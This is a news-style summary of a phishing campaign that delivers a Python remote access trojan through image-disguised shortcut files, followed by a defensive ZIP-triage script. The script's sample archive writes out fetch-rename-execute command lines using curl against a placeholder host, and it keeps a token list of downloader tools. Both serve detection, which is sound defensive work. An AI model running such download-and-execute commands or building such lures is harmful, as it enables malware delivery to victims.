Cybersecurity researchers have unearthed a new attack campaign, active since at least August 2022, that uses a Python-based remote access trojan (RAT) to take control of compromised systems.
“This malware is unique in its utilization of WebSockets to avoid detection and for both command-and-control (C2) communication and exfiltration,” Securonix said in a report shared with The Hacker News.
The malware, dubbed PY#RATION by the cybersecurity firm, comes with a host of capabilities that allow the threat actor to harvest sensitive information. Later versions of the backdoor also add detection-evasion techniques, suggesting that it is being actively developed and maintained.
The attack commences with a phishing email containing a ZIP archive, which, in turn, harbours two shortcut (.LNK) files that masquerade as front and back side images of a seemingly legitimate U.K. driver’s license.
Opening either .LNK file retrieves two text files from a remote server, which are then renamed to .BAT files and executed silently in the background while a decoy image is displayed to the victim.
Also downloaded from a C2 server is another batch script that’s engineered to retrieve additional payloads from the server, including the Python binary (“CortanaAssistance.exe”). The choice of using Cortana, Microsoft’s virtual assistant, indicates an attempt to pass off the malware as a system file.
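The lure described above, a ZIP whose members are shortcut files posing as image scans that launch a command line to fetch a text file, rename it to .BAT and run it hidden, is something a mail gateway or analyst can triage before a user ever double-clicks it. The script below is an added example, not Securonix's or The Hacker News's code. It opens a ZIP in memory, identifies members that carry a genuine Shell Link header, flags double extensions such as `.png.lnk`, and pulls the UTF-16LE string data out of each shortcut to look for downloader-style tokens. The keyword list and the sample archive built in `build_sample_zip()` are constructed for illustration and use no real URLs, file names or commands from the campaign.

```python
"""Triage a ZIP attachment for image-masquerading .LNK droppers.

Added example; not code from Securonix or The Hacker News. The token list
below is a heuristic assumption, not a signature taken from the report.
"""
import io
import re
import zipfile

# ShellLinkHeader: HeaderSize 0x0000004C followed by LinkCLSID
# {00021401-0000-0000-C000-000000000046} in little-endian GUID layout.
LNK_MAGIC = bytes.fromhex("4c000000" "0114020000000000c000000000000046")
IMAGE_EXTS = (".png", ".jpg", ".jpeg", ".gif", ".bmp")
# Tokens typical of a shortcut that downloads, renames and runs a script
# (assumed heuristic list).
SUSPICIOUS_TOKENS = ("cmd", "powershell", "curl", "bitsadmin", "certutil",
                     "http", ".bat", "ren ", "rename", "start /b")


def utf16le_strings(data: bytes, min_len: int = 6):
    """Extract printable UTF-16LE runs from a blob. LNK StringData (name,
    working directory, arguments) is UTF-16LE when IsUnicode is set."""
    pattern = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    return [m.group().decode("utf-16le") for m in pattern.finditer(data)]


def analyse_lnk(name: str, data: bytes):
    """Return a list of findings for one archive member (empty if benign)."""
    findings = []
    lower = name.lower()
    if not lower.endswith(".lnk"):
        return findings
    if not data.startswith(LNK_MAGIC):
        findings.append("has .lnk extension but not a Shell Link header")
        return findings
    stem = lower[:-len(".lnk")]
    if stem.endswith(IMAGE_EXTS):
        findings.append("shortcut masquerading as an image (double extension)")
    text = " ".join(utf16le_strings(data)).lower()
    hits = [t for t in SUSPICIOUS_TOKENS if t in text]
    if hits:
        findings.append("downloader-style arguments: " + ", ".join(hits))
    return findings


def triage_zip(zip_bytes: bytes):
    """Map each suspicious member name to its findings."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            findings = analyse_lnk(info.filename, zf.read(info))
            if findings:
                report[info.filename] = findings
    return report


def build_sample_zip() -> bytes:
    """Constructed lure: two 'licence photo' shortcuts whose arguments fetch a
    text file, rename it to .bat and run it hidden. Placeholder host only."""
    def fake_lnk(args: str) -> bytes:
        # Minimal 0x4C-byte header (magic + zero padding) followed by the
        # argument string; enough for the string scan, not a full LNK.
        header = LNK_MAGIC + b"\x00" * (0x4C - len(LNK_MAGIC))
        return header + args.encode("utf-16le")

    front = fake_lnk("/c curl -s http://example.invalid/f.txt -o %TEMP%\\f.txt "
                     "& ren %TEMP%\\f.txt f.bat & start /b %TEMP%\\f.bat")
    back = fake_lnk("/c curl -s http://example.invalid/b.txt -o %TEMP%\\b.txt "
                    "& ren %TEMP%\\b.txt b.bat & start /b %TEMP%\\b.bat")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("licence_front.png.lnk", front)
        zf.writestr("licence_back.png.lnk", back)
        zf.writestr("readme.txt", "not a shortcut")
    return buf.getvalue()


if __name__ == "__main__":
    for member, findings in triage_zip(build_sample_zip()).items():
        print(member)
        for finding in findings:
            print("  -", finding)
```

The header check matters more than the extension: Windows decides how to open a file by its extension, so a `.png.lnk` member is executed as a shortcut even though Explorer may hide the trailing `.lnk` and show an image icon. Real-world shortcuts carry a full header and optional structures before the string data, so a production tool should parse the LinkFlags and walk the structures rather than grep the blob, but the string scan is enough to surface the fetch-rename-execute pattern the campaign relies on.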